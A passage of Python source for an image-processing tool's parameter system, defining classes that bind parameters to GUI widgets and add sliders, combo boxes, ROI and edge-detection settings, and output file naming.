def __repr__(self):\r\n return (\r\n f\"{repr(self.name)}_\"\r\n f\"{repr(self.desc)}_\"\r\n f\"{repr(self.default_value)}_\"\r\n f\"{repr(self.allowed_values)}_\"\r\n f\"{repr(self.value)}\"\r\n )\r\n\r\n def __eq__(self, other):\r\n return self.name == other.name\r\n\r\n def __ne__(self, other):\r\n return self.name != other.name\r\n\r\n def __copy__(self):\r\n new = type(self)(\r\n name=self.name,\r\n desc=self.desc,\r\n default_value=self.default_value,\r\n allowed_values=self.allowed_values,\r\n hint=self.hint,\r\n widget_type=self.widget_type,\r\n kind=self.kind,\r\n options=self.options,\r\n )\r\n return new\r\n\r\n def clear_widgets(self):\r\n \"\"\"\r\n clear_widgets _summary_\r\n \"\"\"\r\n self._widgets = {}\r\n\r\n def update_ui(self, callback: str, **kwargs):\r\n \"\"\"\r\n update_ui Update target UI\r\n\r\n Args:\r\n callback (str): target callback string name\r\n \"\"\"\r\n callback = self.ui_update_callbacks.get(callback, None)\r\n if callback is None:\r\n return\r\n callback(**kwargs)\r\n\r\n def init(self, tool_name, label, widget, grid_search_mode: bool = False, **kwargs):\r\n self.ui_update_callbacks = dict(**kwargs)\r\n\r\n self.update_ui(\r\n callback=\"set_name\",\r\n widget=widget,\r\n new_name=f\"ipt_param_{tool_name}_{self.name}\",\r\n )\r\n self.update_ui(\r\n callback=\"set_name\",\r\n widget=label,\r\n new_name=f\"ipt_param_label_{tool_name}_{self.name}\",\r\n )\r\n\r\n self.label = label\r\n self.update_label()\r\n self.grid_search_mode = grid_search_mode\r\n if self.is_input:\r\n self.input = widget\r\n if widget is None:\r\n return False\r\n elif grid_search_mode:\r\n self.update_ui(\r\n callback=\"set_text\",\r\n widget=self.gs_input,\r\n text=self.grid_search_options,\r\n )\r\n elif isinstance(self.allowed_values, dict):\r\n self.update_ui(\r\n callback=\"add_items\",\r\n widget=widget,\r\n items=self.allowed_values,\r\n default=self.value,\r\n )\r\n elif isinstance(self.allowed_values, tuple):\r\n if self.allowed_values == (0, 1):\r\n self.update_ui(\r\n callback=\"set_checked\",\r\n widget=widget,\r\n new_check_state=self.value == 1,\r\n )\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.desc)\r\n elif len(self.allowed_values) == 2:\r\n self.update_ui(\r\n callback=\"set_range\",\r\n widget=widget,\r\n min_val=self.allowed_values[0],\r\n max_val=self.allowed_values[1],\r\n default_val=int(self.value),\r\n )\r\n else:\r\n return False\r\n elif isinstance(self.allowed_values, str):\r\n if hasattr(widget, \"textEdited\"):\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.value)\r\n elif hasattr(widget, \"clicked\"):\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.desc)\r\n elif hasattr(widget, \"insertPlainText\"):\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.value)\r\n else:\r\n return False\r\n if self.is_output:\r\n self.output = widget\r\n self.update_output(label_text=self.desc, output_value=self.value)\r\n\r\n self.update_ui(callback=\"set_tool_tip\", widget=widget, tool_tip=self.hint)\r\n self.update_ui(callback=\"set_tool_tip\", widget=label, tool_tip=self.hint)\r\n\r\n self.update_ui(callback=\"connect_call_back\", widget=widget, param=self)\r\n\r\n return True\r\n\r\n def update_label(self):\r\n lbl = self.label\r\n if lbl is None:\r\n return False\r\n if (\r\n isinstance(self.allowed_values, dict)\r\n or isinstance(self.allowed_values, str)\r\n or (self.widget_type == \"spin_box\")\r\n ):\r\n self.update_ui(callback=\"set_text\", widget=lbl, text=self.desc)\r\n elif isinstance(self.allowed_values, tuple) and (len(self.allowed_values) == 2):\r\n self.update_ui(\r\n callback=\"set_text\", widget=lbl, text=f\"{self.desc}: {self.value}\"\r\n )\r\n else:\r\n return False\r\n self.update_ui(callback=\"set_tool_tip\", widget=lbl, tool_tip=self.hint)\r\n return True\r\n\r\n def update_input(self, new_values=None):\r\n if not self.is_input:\r\n return False\r\n if self.kind == \"button\":\r\n return True\r\n widget = self.input\r\n if isinstance(self.allowed_values, dict):\r\n if (\r\n (new_values is not None)\r\n and isinstance(new_values, dict)\r\n and (self.allowed_values.keys() - new_values.keys() != {})\r\n ):\r\n if self.options.get(\"enable_none\", False) is True:\r\n self.allowed_values = {**{\"none\": \"none\"}, **new_values}\r\n else:\r\n self.allowed_values = new_values\r\n if widget is not None:\r\n bck_value = self.value\r\n self.update_ui(callback=\"clear\", widget=widget)\r\n self.update_ui(\r\n callback=\"add_items\",\r\n widget=widget,\r\n items=self.allowed_values,\r\n default=bck_value,\r\n )\r\n self._value = bck_value\r\n elif widget is not None:\r\n for i, key in enumerate(self.allowed_values):\r\n if self.value == key:\r\n self.update_ui(\r\n callback=\"set_current_index\",\r\n widget=widget,\r\n index=i,\r\n )\r\n break\r\n elif isinstance(self.allowed_values, tuple):\r\n if self.allowed_values == (0, 1) and widget is not None:\r\n self.update_ui(\r\n callback=\"set_checked\",\r\n widget=widget,\r\n new_check_state=self.value == 1,\r\n )\r\n elif len(self.allowed_values) == 2:\r\n if (\r\n (new_values is not None)\r\n and isinstance(new_values, tuple)\r\n and (self.allowed_values != new_values)\r\n ):\r\n self.allowed_values = new_values\r\n if widget is not None:\r\n self.update_ui(\r\n callback=\"set_range\",\r\n widget=widget,\r\n min_val=self.allowed_values[0],\r\n max_val=self.allowed_values[1],\r\n default_val=None,\r\n )\r\n if widget is not None:\r\n self.update_ui(\r\n callback=\"set_value\",\r\n widget=widget,\r\n value=int(self.value),\r\n )\r\n else:\r\n return False\r\n elif isinstance(self.allowed_values, str):\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.value)\r\n else:\r\n return False\r\n self.update_ui(callback=\"set_tool_tip\", widget=widget, tool_tip=self.hint)\r\n return True\r\n\r\n def update_output(\r\n self,\r\n label_text: str = \"\",\r\n output_value=None,\r\n ignore_list=(),\r\n invert=False,\r\n ):\r\n if not self.is_output:\r\n return False\r\n self._value = output_value\r\n if label_text and isinstance(label_text, str):\r\n self.desc = label_text\r\n self.update_label()\r\n widget = self.output\r\n if widget is None:\r\n return True\r\n elif self.allowed_values == \"single_line_text_output\":\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.value)\r\n elif self.allowed_values == \"multi_line_text_output\":\r\n self.update_ui(callback=\"clear\", widget=widget)\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.value)\r\n elif self.allowed_values == \"table_output\":\r\n self.update_ui(callback=\"clear\", widget=widget)\r\n self.update_ui(\r\n callback=\"update_table\",\r\n widget=widget,\r\n items=self._value,\r\n ignore_list=ignore_list,\r\n invert_order=invert,\r\n )\r\n else:\r\n return False\r\n\r\n return True\r\n\r\n def add_option_to_grid_search(self, new_option: str):\r\n self.grid_search_options = f\"{self._grid_search_options},{new_option}\"\r\n\r\n @staticmethod\r\n def decode_string(gs_code: str):\r\n res = []\r\n for opt_ in gs_code.replace(\" \", \"\").split(\",\"):\r\n try:\r\n if (\"|\" in opt_) and (\";\" in opt_):\r\n bd, step = opt_.split(\";\")\r\n left, right = bd.split(\"|\")\r\n left, right = min(int(left), int(right) + 1), max(\r\n int(left), int(right) + 1\r\n )\r\n res.extend([i for i in range(left, right, int(step))])\r\n else:\r\n res.append(opt_)\r\n except ValueError as e:\r\n logger.exception(f'String decoding failed: \"{repr(e)}\"')\r\n return [str(i) for i in sorted(list(set(res)))]\r\n\r\n def decode_grid_search_options(self):\r\n return self.decode_string(self._grid_search_options)\r\n\r\n def auto_fill_grid_search(self, step=None):\r\n if not self.is_input:\r\n return False\r\n widget = self.input\r\n if widget is None:\r\n return False\r\n if isinstance(self.allowed_values, dict):\r\n return \",\".join([k for k in self.allowed_values.keys()])\r\n elif isinstance(self.allowed_values, tuple):\r\n if self.allowed_values == (0, 1):\r\n return \"0,1\"\r\n elif len(self.allowed_values) == 2:\r\n min_ = min(self.allowed_values[0], self.allowed_values[1])\r\n max_ = max(self.allowed_values[0], self.allowed_values[1])\r\n if step is None:\r\n step = (max_ - min_) // 10\r\n return f\"{min_}|{max_};{step}\"\r\n else:\r\n return \"\"\r\n else:\r\n return \"\"\r\n\r\n @property\r\n def value(self):\r\n return self._value\r\n\r\n @value.setter\r\n def value(self, value):\r\n if value != self._value:\r\n self._value = value\r\n if self.on_change is not None:\r\n self.on_change(self)\r\n\r\n @property\r\n def str_value(self):\r\n if isinstance(self.value, str):\r\n return f\"'{self.value}'\"\r\n else:\r\n return str(self.value)\r\n\r\n @property\r\n def grid_search_options(self):\r\n return self._grid_search_options\r\n\r\n @grid_search_options.setter\r\n def grid_search_options(self, value):\r\n if self._grid_search_options != value:\r\n self._grid_search_options = value\r\n widget = self.gs_input\r\n if widget is not None:\r\n self.update_ui(callback=\"set_text\", widget=widget, text=value)\r\n\r\n @property\r\n def input(self):\r\n return self._widgets.get(\"input\", None)\r\n\r\n @input.setter\r\n def input(self, value):\r\n self._widgets[\"input\"] = value\r\n\r\n @property\r\n def output(self):\r\n return self._widgets.get(\"output\", None)\r\n\r\n @output.setter\r\n def output(self, value):\r\n self._widgets[\"output\"] = value\r\n\r\n @property\r\n def label(self):\r\n return self._widgets.get(\"label\", None)\r\n\r\n @label.setter\r\n def label(self, value):\r\n self._widgets[\"label\"] = value\r\n\r\n @property\r\n def gs_label(self):\r\n return self._widgets.get(\"gs_label\", None)\r\n\r\n @gs_label.setter\r\n def gs_label(self, value):\r\n self._widgets[\"gs_label\"] = value\r\n self.update_ui(callback=\"set_text\", widget=value, text=self.desc)\r\n\r\n @property\r\n def gs_input(self):\r\n return self._widgets.get(\"gs_input\", None)\r\n\r\n @gs_input.setter\r\n def gs_input(self, value):\r\n self._widgets[\"gs_input\"] = value\r\n\r\n @property\r\n def gs_auto_fill(self):\r\n return self._widgets.get(\"gs_auto_fill\", None)\r\n\r\n @gs_auto_fill.setter\r\n def gs_auto_fill(self, value):\r\n self._widgets[\"gs_auto_fill\"] = value\r\n\r\n @property\r\n def gs_copy_from_param(self):\r\n return self._widgets.get(\"gs_copy_from_param\", None)\r\n\r\n @gs_copy_from_param.setter\r\n def gs_copy_from_param(self, value):\r\n self._widgets[\"gs_copy_from_param\"] = value\r\n\r\n @property\r\n def gs_reset(self):\r\n return self._widgets.get(\"gs_reset\", None)\r\n\r\n @gs_reset.setter\r\n def gs_reset(self, value):\r\n self._widgets[\"gs_reset\"] = value\r\n\r\n @property\r\n def is_input(self):\r\n return not isinstance(self.allowed_values, str) or (\r\n \"input\" in self.allowed_values\r\n )\r\n\r\n @property\r\n def is_output(self):\r\n return isinstance(self.allowed_values, str) and not (\r\n \"input\" in self.allowed_values\r\n )\r\n\r\n @property\r\n def is_neutral(self):\r\n return self.is_output and (self.allowed_values in [\"label\"])\r\n\r\n @property\r\n def is_default(self):\r\n return self.value == self.default_value\r\n\r\n\r\nclass IptParamHolder(object):\r\n def __init__(self, **kwargs):\r\n super(IptParamHolder, self).__init__()\r\n\r\n self.block_feedback = False\r\n self._kwargs = None\r\n self._param_list = kwargs.get(\"_param_list\", None)\r\n if self._param_list is None:\r\n self._param_list = []\r\n self.build_params()\r\n for key, value in kwargs.items():\r\n self.set_or_add_value(key, value)\r\n\r\n def __eq__(self, other) -> bool:\r\n if (other is None) or (len(self.gizmos) != len(other.gizmos)):\r\n return False\r\n else:\r\n for s, o in zip(self.gizmos, other.gizmos):\r\n if (s.value != o.value) or (s.name != o.name):\r\n return False\r\n return True\r\n\r\n def copy(self):\r\n return self.__class__(**self.params_to_dict())\r\n\r\n def build_params(self):\r\n pass\r\n\r\n def reset(self, is_update_widgets: bool = True):\r\n self.block_feedback = True\r\n try:\r\n for p in self._param_list:\r\n p.value = p.default_value\r\n if is_update_widgets:\r\n p.update_label()\r\n p.update_input()\r\n p.update_output()\r\n finally:\r\n self.block_feedback = False\r\n\r\n def add(self, new_item) -> IptParam:\r\n try:\r\n self._param_list.append(new_item)\r\n except Exception as e:\r\n logger.exception(f'Failed to add param \"{repr(e)}')\r\n else:\r\n return new_item\r\n\r\n def add_combobox(\r\n self,\r\n name: str,\r\n desc: str,\r\n default_value: str = \"\",\r\n values: dict = {},\r\n hint: str = \"\",\r\n ) -> IptParam:\r\n try:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=values,\r\n hint=hint,\r\n )\r\n param.widget_type = \"combo_box\"\r\n return self.add(param)\r\n except Exception as e:\r\n logger.exception(f'Failed to add param \"{repr(e)}')\r\n\r\n def add_slider(\r\n self,\r\n name: str,\r\n desc: str,\r\n default_value: int = 0,\r\n minimum: int = 0,\r\n maximum: int = 100,\r\n hint: str = \"\",\r\n ) -> IptParam:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=(minimum, maximum),\r\n hint=hint,\r\n )\r\n param.widget_type = \"slider\"\r\n return self.add(param)\r\n\r\n def add_checkbox(self, name, desc, default_value: int, hint=\"\") -> IptParam:\r\n \"\"\"Add a checkbox to the widgets\r\n\r\n Arguments:\r\n name {str} -- name used to access the widget\r\n desc {str} -- name used for the label associated to the comobobox\r\n default_value {str} -- default value, dictionary key\r\n\r\n Keyword Arguments:\r\n hint {str} -- hover hint (default: {''})\r\n\r\n Returns:\r\n IptParam -- built param\r\n \"\"\"\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=(0, 1),\r\n hint=hint,\r\n )\r\n param.widget_type = \"checkbox\"\r\n return self.add(param)\r\n\r\n def add_text_input(\r\n self,\r\n name: str,\r\n desc: str,\r\n default_value: str = \"-\",\r\n hint: str = \"\",\r\n is_single_line: bool = True,\r\n ) -> IptParam:\r\n if is_single_line:\r\n mode_ = \"single_line_text_input\"\r\n else:\r\n mode_ = \"multi_line_text_input\"\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=mode_,\r\n hint=hint,\r\n )\r\n param.widget_type = mode_\r\n return self.add(param)\r\n\r\n def add_text_output(\r\n self,\r\n is_single_line: bool,\r\n name: str,\r\n desc: str,\r\n default_value: str = \"-\",\r\n hint: str = \"\",\r\n ) -> IptParam:\r\n if is_single_line:\r\n mode_ = \"single_line_text_output\"\r\n else:\r\n mode_ = \"multi_line_text_output\"\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=mode_,\r\n hint=hint,\r\n )\r\n param.widget_type = mode_\r\n return self.add(param)\r\n\r\n def add_table_output(\r\n self,\r\n name: str,\r\n desc: tuple,\r\n default_value: dict = {},\r\n hint: str = \"\",\r\n ) -> IptParam:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=\"table_output\",\r\n hint=hint,\r\n )\r\n param.widget_type = \"table_output\"\r\n return self.add(param)\r\n\r\n def add_text_overlay(self, default_value: int = 0) -> IptParam:\r\n param = IptParam(\r\n name=\"text_overlay\",\r\n desc=\"Overlay text on top of images\",\r\n default_value=default_value,\r\n allowed_values=(0, 1),\r\n hint=\"Draw description text on top of images\",\r\n )\r\n param.widget_type = \"checkbox\"\r\n param.kind = \"text_overlay_cb\"\r\n return self.add(param)\r\n\r\n def add_label(self, desc: str, hint: str = \"\") -> IptParam:\r\n param = IptParam(\r\n name=f\"lbl_{len(self._param_list)}\",\r\n desc=desc,\r\n default_value=desc,\r\n allowed_values=\"label\",\r\n hint=hint,\r\n )\r\n param.widget_type = \"label\"\r\n return self.add(param)\r\n\r\n def add_separator(self, name: str = \"\") -> IptParam:\r\n if not name:\r\n name = f\"sep_{len(self._param_list)}\"\r\n param = IptParam(\r\n name=name,\r\n desc=\"\",\r\n default_value=\"\",\r\n allowed_values=\"label\",\r\n hint=\"\",\r\n )\r\n param.widget_type = \"label\"\r\n return self.add(param)\r\n\r\n def add_color_selector(\r\n self,\r\n name=\"color\",\r\n desc=\"Select color\",\r\n default_value=\"light_steel_blue\",\r\n hint=\"\",\r\n enable_none: bool = False,\r\n ) -> IptParam:\r\n if enable_none:\r\n values = {\"none\": \"none\"}\r\n else:\r\n values = {}\r\n values = {**values, **{k: k for k in ipc.all_colors_dict}}\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=values,\r\n hint=hint,\r\n )\r\n param.widget_type = \"combo_box\"\r\n param.kind = \"color_selector\"\r\n return self.add(param)\r\n\r\n def add_enabled_checkbox(self) -> IptParam:\r\n return self.add_checkbox(\r\n name=\"enabled\",\r\n desc=\"Activate tool\",\r\n default_value=1,\r\n hint=\"Toggle whether or not tool is active\",\r\n )\r\n\r\n def add_file_naming(\r\n self,\r\n output_format: str = \"source\",\r\n output_name: str = \"as_source\",\r\n global_prefix: str = \"\",\r\n ) -> IptParam:\r\n self.add_combobox(\r\n name=f\"{global_prefix}output_format\",\r\n desc=\"Image output format\",\r\n default_value=output_format,\r\n values=dict(\r\n source=\"As source image\",\r\n jpg=\"JPEG\",\r\n png=\"PNG\",\r\n tiff=\"TIFF\",\r\n tif=\"TIF\",\r\n ),\r\n )\r\n self.add_text_input(\r\n name=f\"{global_prefix}subfolders\",\r\n desc=\"Subfolders\",\r\n default_value=\"\",\r\n hint='Subfolder names separated byt \",\"',\r\n )\r\n self.add_combobox(\r\n name=f\"{global_prefix}output_name\",\r\n desc=\"Output naming convention\",\r\n default_value=output_name,\r\n values=dict(\r\n as_source=\"Same as source\",\r\n hash=\"Use hash for anonymous names\",\r\n ),\r\n )\r\n self.add_text_input(\r\n name=f\"{global_prefix}prefix\",\r\n desc=\"Prefix\",\r\n default_value=\"\",\r\n hint=\"Use text as prefix\",\r\n )\r\n self.add_text_input(\r\n name=f\"{global_prefix}suffix\",\r\n desc=\"Suffix\",\r\n default_value=\"\",\r\n hint=\"Use text as suffix\",\r\n )\r\n self.add_checkbox(\r\n name=f\"{global_prefix}make_safe_name\",\r\n desc=\"Replace unsafe caracters\",\r\n default_value=1,\r\n hint='Will replace *\"/\\\\[]:;|=,<> with \"_\"',\r\n )\r\n\r\n def build_path(\r\n self,\r\n file_prefix: str = \"\",\r\n salt: str = \"\",\r\n override_filename: str = \"\",\r\n ) -> str:\r\n \"\"\"Creates a fully qualified filename from data generated by add_file_naming\r\n\r\n Returns:\r\n str: File name\r\n \"\"\"\r\n return os.path.join(\r\n self.build_folder_path(file_prefix=file_prefix),\r\n self.build_filename(\r\n file_prefix=file_prefix,\r\n salt=salt,\r\n override_filename=override_filename,\r\n ),\r\n )\r\n\r\n def build_folder_path(self, file_prefix: str = \"\") -> str:\r\n fld = self.output_path\r\n subfolders = self.get_value_of(f\"{file_prefix}subfolders\")\r\n if subfolders:\r\n fld = os.path.join(\r\n fld, *[make_safe_name(sf) for sf in subfolders.split(\",\")]\r\n )\r\n\r\n return fld\r\n\r\n def build_filename(\r\n self,\r\n file_prefix: str = \"\",\r\n salt: str = \"\",\r\n override_filename: str = \"\",\r\n ) -> str:\r\n wrapper = self.wrapper\r\n\r\n if override_filename:\r\n dst_name = override_filename\r\n else:\r\n # Build output file name\r\n output_name_mode = self.get_value_of(f\"{file_prefix}output_name\")\r\n if output_name_mode == \"as_source\":\r\n dst_name = wrapper.file_handler.file_name_no_ext\r\n elif output_name_mode == \"hash\":\r\n dst_name = self.hash_luid()\r\n else:\r\n dst_name = \"unk\"\r\n logger.error(f\"Unknown output name convention: '{output_name_mode}'\")\r\n\r\n prefix = self.get_value_of(f\"{file_prefix}prefix\")\r\n if prefix:\r\n dst_name = prefix + dst_name\r\n\r\n suffix = self.get_value_of(f\"{file_prefix}suffix\")\r\n if suffix:\r\n dst_name += suffix\r\n\r\n if self.get_value_of(f\"{file_prefix}make_safe_name\"):\r\n dst_name = make_safe_name(dst_name)\r\n\r\n # Get new extension\r\n file_ext = self.get_value_of(f\"{file_prefix}output_format\")\r\n if file_ext == \"source\":\r\n file_ext = self.wrapper.file_handler.file_ext\r\n else:\r\n file_ext = f\".{file_ext}\"\r\n\r\n return f\"{dst_name}{salt}{file_ext}\"\r\n\r\n def save_images(self, additional_images: list, file_prefix: str = \"\", **kwargs):\r\n wrapper = self.init_wrapper(**kwargs)\r\n dst_path = self.build_path(file_prefix=file_prefix)\r\n self.add_value(\r\n key=self.get_value_of(\"img_name\"),\r\n value=os.path.basename(dst_path),\r\n force_add=True,\r\n )\r\n force_directories(os.path.join(os.path.dirname(dst_path), \"\"))\r\n cv2.imwrite(filename=dst_path, img=self.result)\r\n # Add linked images\r\n if (\r\n self.get_value_of(\"grab_linked_images\", default_value=0) == 1\r\n ) and additional_images:\r\n file_ext = (\r\n wrapper.file_handler.file_ext\r\n if self.get_value_of(f\"{file_prefix}output_format\") == \"source\"\r\n else f\".{self.get_value_of(f'{file_prefix}output_format')}\"\r\n )\r\n base_name, _ = os.path.splitext(os.path.basename(dst_path))\r\n root_folder = os.path.join(os.path.dirname(dst_path), \"\")\r\n\r\n for k, v in additional_images.items():\r\n self.add_value(\r\n key=f'{self.get_value_of(\"img_name\")}_{k}',\r\n value=f\"{base_name}_{k}{file_ext}\",\r\n force_add=True,\r\n )\r\n cv2.imwrite(\r\n filename=os.path.join(\r\n root_folder,\r\n f\"{base_name}_{k}{file_ext}\",\r\n ),\r\n img=v,\r\n )\r\n\r\n def add_channel_selector(\r\n self,\r\n default_value,\r\n name=\"channel\",\r\n desc=\"Channel\",\r\n hint: str = \"\",\r\n enable_none: bool = False,\r\n ) -> IptParam:\r\n if enable_none:\r\n values = {\"none\": \"none\"}\r\n else:\r\n values = {}\r\n values = {\r\n **values,\r\n **{k: v for k, v in ipc.CHANNELS_VISIBLE.items()},\r\n }\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=values,\r\n hint=hint,\r\n )\r\n if enable_none:\r\n param.options[\"enable_none\"] = True\r\n param.widget_type = \"combo_box\"\r\n param.kind = \"channel_selector\"\r\n return self.add(param)\r\n\r\n def add_arithmetic_operator(\r\n self,\r\n default_value=\"plus\",\r\n name=\"operator\",\r\n desc=\"Arithmetic operator\",\r\n hint=\"Operator to use with operands\",\r\n ) -> IptParam:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=dict(plus=\"+\", minus=\"-\", mult=\"*\", div=\"/\", power=\"^\"),\r\n hint=hint,\r\n )\r\n param.widget_type = \"combo_box\"\r\n param.kind = \"arithmetic_operator\"\r\n return self.add(param)\r\n\r\n def add_source_selector(\r\n self,\r\n name: str = \"source_file\",\r\n desc: str = \"Select source file type\",\r\n default_value: str = \"source\",\r\n ) -> IptParam:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=dict(\r\n source=\"source\",\r\n mask=\"mask\",\r\n source_roi=\"Source with ROIs applied\",\r\n process_roi=\"Use roi created for process\",\r\n masked_source=\"masked source\",\r\n cropped_source=\"source cropped to keep ROI (if available)\",\r\n source_median=\"source with median filter (5 if not set)\",\r\n ),\r\n )\r\n param.widget_type = \"combo_box\"\r\n param.kind = \"source_selector\"\r\n return self.add(param)\r\n\r\n def add_color_map_selector(\r\n self,\r\n name=\"color_map\",\r\n default_value=\"c_2\",\r\n desc=\"Select pseudo color map\",\r\n hint=\"\",\r\n ) -> IptParam:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=dict(\r\n a_0=\"Autumn\",\r\n b_1=\"Bone\",\r\n c_2=\"Jet\",\r\n d_3=\"Winter\",\r\n e_4=\"Rainbow\",\r\n f_5=\"Ocean\",\r\n g_6=\"Summer\",\r\n h_7=\"Spring\",\r\n i_8=\"Cool\",\r\n j_9=\"HSV\",\r\n k_10=\"Pink\",\r\n l_11=\"Hot\",\r\n ),\r\n hint=hint,\r\n )\r\n param.widget_type = \"combo_box\"\r\n param.kind = \"color_map_selector\"\r\n return self.add(param)\r\n\r\n def add_color_space(self, default_value) -> IptParam:\r\n param = IptParam(\r\n name=\"color_space\",\r\n desc=\"Color space\",\r\n default_value=default_value,\r\n allowed_values=dict(HSV=\"HSV\", LAB=\"LAB\", RGB=\"RGB\"),\r\n )\r\n param.widget_type = \"combo_box\"\r\n param.kind = \"color_space_selector\"\r\n return self.add(param)\r\n\r\n def add_roi_type(self, default_value=\"other\") -> IptParam:\r\n param = IptParam(\r\n name=\"roi_type\",\r\n desc=\"Select action linked to ROI\",\r\n default_value=default_value,\r\n allowed_values=dict(\r\n keep=\"Keep region inside ROI\",\r\n delete=\"Delete region inside ROI\",\r\n crop=\"Crop image to ROI (most tools don not support this option)\",\r\n safe=\"Region inside ROI is safe\",\r\n enforce=\"Check mask position\",\r\n erode=\"Erode region inside ROI - mask only\",\r\n dilate=\"Dilate region inside ROI - mask only\",\r\n open=\"Open region inside ROI - mask only\",\r\n close=\"Close region inside ROI - mask only\",\r\n other=\"No predefined behavior\",\r\n ),\r\n )\r\n param.kind = \"roi_type_selector\"\r\n return self.add(param)\r\n\r\n def add_roi_name(self, default_value: str = \"unnamed_roi\") -> IptParam:\r\n param = self.add_text_input(\r\n name=\"roi_name\", desc=\"ROI name\", default_value=\"unnamed_roi\"\r\n )\r\n param.kind = \"roi_name_selector\"\r\n return param\r\n\r\n def add_tool_target(self) -> IptParam:\r\n param = IptParam(\r\n name=\"tool_target\",\r\n desc=\"Target IPT\",\r\n default_value=\"none\",\r\n allowed_values=dict(none=\"None\"),\r\n )\r\n param.kind = \"tool_target_selector\"\r\n return self.add(param)\r\n\r\n def add_roi_shape(self, default_value=\"rectangle\") -> IptParam:\r\n param = IptParam(\r\n name=\"roi_shape\",\r\n desc=\"Select ROI shape\",\r\n default_value=default_value,\r\n allowed_values=dict(\r\n rectangle=\"Rectangle\",\r\n circle=\"Circle, will be treated as rectangle for morphology\",\r\n ),\r\n )\r\n param.kind = \"roi_shape_selector\"\r\n return self.add(param)\r\n\r\n def add_roi_settings(\r\n self,\r\n default_name: str = \"unnamed_roi\",\r\n default_type: str = \"other\",\r\n default_shape: str = \"\",\r\n ) -> IptParam:\r\n self.add_roi_name(default_value=default_name)\r\n self.add_roi_type(default_value=default_type)\r\n if default_shape:\r\n self.add_roi_shape(default_value=default_shape)\r\n self.add_tool_target()\r\n\r\n def add_hierarchy_threshold(self, default_value: int = 35) -> IptParam:\r\n self.add_slider(\r\n name=\"hierarchy_threshold\",\r\n desc=\"Label merger threshold\",\r\n default_value=default_value,\r\n minimum=0,\r\n maximum=1000,\r\n hint=\"Regions connected by an edge with weight smaller than thresh are merged\",\r\n )\r\n\r\n def add_edge_detector(self, default_operator: str = \"canny_opcv\"):\r\n self.add_combobox(\r\n name=\"operator\",\r\n desc=\"Select edge detection operator\",\r\n default_value=default_operator,\r\n values=dict(\r\n canny_opcv=\"Canny OpenCV\",\r\n canny_scik=\"Canny Scikit\",\r\n laplacian=\"Laplacian\",\r\n sobel=\"Sobel\",\r\n sobel_v=\"Sobel vertical\",\r\n sobel_h=\"Sobel horizontal\",\r\n roberts=\"Roberts\",\r\n prewitt=\"Prewitt\",\r\n ),\r\n )\r\n self.add_spin_box(\r\n name=\"canny_sigma\",\r\n desc=\"Canny's sigma for scikit, aperture for OpenCV\",\r\n default_value=2,\r\n minimum=0,\r\n maximum=20,\r\n hint=\"Sigma.\",\r\n )\r\n self.add_spin_box(\r\n name=\"canny_first\",\r\n desc=\"Canny's first Threshold\",\r\n default_value=0,\r\n minimum=0,\r\n maximum=255,\r\n hint=\"First threshold for the hysteresis procedure.\",\r\n )\r\n self.add_spin_box(\r\n name=\"canny_second\",\r\n desc=\"Canny's second Threshold\",\r\n default_value=255,\r\n minimum=0,\r\n maximum=255,\r\n hint=\"Second threshold for the hysteresis procedure.\",\r\n )\r\n self.add_spin_box(\r\n name=\"kernel_size\",\r\n desc=\"Kernel size\",\r\n default_value=5,\r\n minimum=0,\r\n maximum=27,\r\n )\r\n self.add_spin_box(\r\n name=\"threshold\",\r\n desc=\"Threshold\",\r\n default_value=130,\r\n minimum=0,\r\n maximum=255,\r\n hint=\"Threshold for kernel based operators\",\r\n )\r\n self.add_checkbox(\r\n name=\"apply_threshold\", desc=\"Apply threshold\", default_value=1\r\n )\r\n\r\n def add_binary_threshold(self, add_morphology: bool = True):\r\n self.add_spin_box(\r\n name=\"min_t\",\r\n desc=\"Threshold min value\",\r\n default_value=0,\r\n minimum=0,\r\n maximum=255,\r\n )\r\n self.add_spin_box(\r\n name=\"max_t\",\r\n desc=\"Threshold max value\",\r\n default_value=255,\r\n minimum=0,\r\n maximum=255,\r\n )\r\n self.add_slider(\r\n name=\"median_filter_size\",\r\n desc=\"Median filter size (odd values only)\",\r\n default_value=0,\r\n minimum=0,\r\n maximum=51,\r\n )\r\n if add_morphology:\r\n self.add_morphology_operator()\r\n\r\n def add_roi_selector(self):\r\n self.add_text_input(\r\n name=\"roi_names\",\r\n desc=\"Name of ROI to be used\",\r\n default_value=\"\",\r\n hint=\"Operation will only be applied inside of ROI\",\r\n )\r\n\r\n def add_morphology_operator(self, default_operator: str = \"none\"):\r\n self.add_combobox(\r\n name=\"morph_op\",\r\n desc=\"Morphology operator\",\r\n default_value=default_operator,\r\n values=dict(\r\n none=\"none\", erode=\"erode\", dilate=\"dilate\", open=\"open\", close=\"close\"\r\n ),\r\n )\r\n self.add_spin_box(\r\n name=\"kernel_size\",\r\n desc=\"Kernel size\",\r\n default_value=3,\r\n minimum=3,\r\n maximum=101,\r\n )\r\n self.add_combobox(\r\n name=\"kernel_shape\",\r\n desc=\"Kernel shape\",\r\n default_value=\"ellipse\",\r\n values=dict(ellipse=\"ellipse\", rectangle=\"rectangle\", cross=\"cross\"),\r\n )\r\n self.add_spin_box(\r\n name=\"proc_times\",\r\n desc=\"Iterations\",\r\n default_value=1,\r\n minimum=1,\r\n maximum=100,\r\n 